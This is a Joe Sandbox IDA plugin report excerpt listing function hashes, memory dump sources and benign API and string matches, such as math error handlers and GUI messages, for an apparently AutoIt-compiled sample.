                                                                      • Instruction ID: 7e6a90e65f14efa1aa74edf06310556ef848458564452ff16fecfece871d0aaf
                                                                      • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                      • Instruction Fuzzy Hash: 57314A32A08781CAE770EF65B445B5AB7A1F785790F504239EAA993B99DF3CD841CF00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                      • Instruction ID: f91df47f6dbb8d77c121e35fab7d72b9440ab9767dd0ea3dea2bca1b71584da6
                                                                      • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                      • Instruction Fuzzy Hash: EF313836A0CB81CAE760EF15A44475AB7A1F785790F104235EAAC93B99DF3CD881CF00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                      • Instruction ID: 6ed6d763414cfc78c288c6ef2747c4d44c538edf4916c2b6631f0ca5540554a6
                                                                      • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                      • Instruction Fuzzy Hash: 8B11CB36E1C68282EB51BB19E0013BD2261E780749F944135DA4DD7699EF3DD842D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 3678867486-1403004172
                                                                      • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                      • Instruction ID: 5a2ae3bdaa9609ec6accdd894763043206daf32bedb0adf270f46723e289c591
                                                                      • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                      • Instruction Fuzzy Hash: CE11B222A1DA8191FB10FB10E5521E96360FF89784F488431EA8CD7B8BFF2CD609DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$tan
                                                                      • API String ID: 3384550415-2428968949
                                                                      • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                      • Instruction ID: 279d46f398e57d0694e9cfa5b8b8e4afe51e6e88d858a6a4fab077cf17701f6a
                                                                      • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                      • Instruction Fuzzy Hash: 2C01D631A2DB8541DA14EF12A41133AA152FBDA7D4F105335E95E5BB89FF3CD0509B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$cos
                                                                      • API String ID: 3384550415-1949035351
                                                                      • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                      • Instruction ID: e9eb159599796041ab3de3180df3917ace2f74f310c6691eabe45915696bdb12
                                                                      • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                      • Instruction Fuzzy Hash: 80012832E1DB8981DA14EF22941133AA152BFDA7D4F105335E95E5ABC9FF3DD0505B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$sin
                                                                      • API String ID: 3384550415-1565623160
                                                                      • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                      • Instruction ID: df2126984ee99733bcc17300033f5cfcf1fca3b9da1675a6b2e2c490ba0047e2
                                                                      • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                      • Instruction Fuzzy Hash: 8E01B572E1DB8541DA14EF22941133AA262BF9A7D4F105335E95A5AB89FF6DD0405B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _handle_error
                                                                      • String ID: "$exp
                                                                      • API String ID: 1757819995-2878093337
                                                                      • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                      • Instruction ID: 390a654600997eda41bba07db6b995666e0a98338e241c02ffce3dfa15d3c558
                                                                      • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                      • Instruction Fuzzy Hash: 3701C83692DB8887E220EF34D4466AA77B0FFEA744F205315E7452AA61DB7DD4C1DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: AutoIt$Error allocating memory.
                                                                      • API String ID: 2030045667-4017498283
                                                                      • Opcode ID: 47289967b9eb923feb30cdf6953810302e06e8d280c3038f2442cbc3514d9180
                                                                      • Instruction ID: eea1be16faf86eb80cd306fa4e49ac40f68d18ccec5861161e59d66d4517ebbc
                                                                      • Opcode Fuzzy Hash: 47289967b9eb923feb30cdf6953810302e06e8d280c3038f2442cbc3514d9180
                                                                      • Instruction Fuzzy Hash: 65F0E520B1C64642FB68B351B1433F92251AF88780F545431D91DE7BDBEDBCD4C5A700
                                                                      APIs
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6439475E9
                                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF643947241,?,?,?,?,00007FF64394660C,?,?,?,?,00007FF643944CD3), ref: 00007FF643947600
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Valuetry_get_function
                                                                      • String ID: FlsSetValue
                                                                      • API String ID: 738293619-3750699315
                                                                      • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                      • Instruction ID: 8c1cc5d2687f3a90a2c179c5c14a5775797ad15ff82986a40fede04a0bb2796c
                                                                      • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                      • Instruction Fuzzy Hash: DEE09B62A0C54681FA457B55F4034F52362EF58B91F984035D92DE735BEE3CE444D710
                                                                      APIs
                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF643945629
                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 00007FF64394563A
                                                                        • Part of subcall function 00007FF643947018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF64394563F), ref: 00007FF64394708D
                                                                        • Part of subcall function 00007FF643947018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF64394563F), ref: 00007FF6439470BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3561508498-410509341
                                                                      • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                      • Instruction ID: 5a6fb196d143c36eba2a07fa6ac8acfa05896edc9396ed3b28bfc72b73b42220
                                                                      • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                      • Instruction Fuzzy Hash: D0D05B2261C54691DE10FF04D4423A46330F751308FD04431D15CD25B6FF3CD64AE700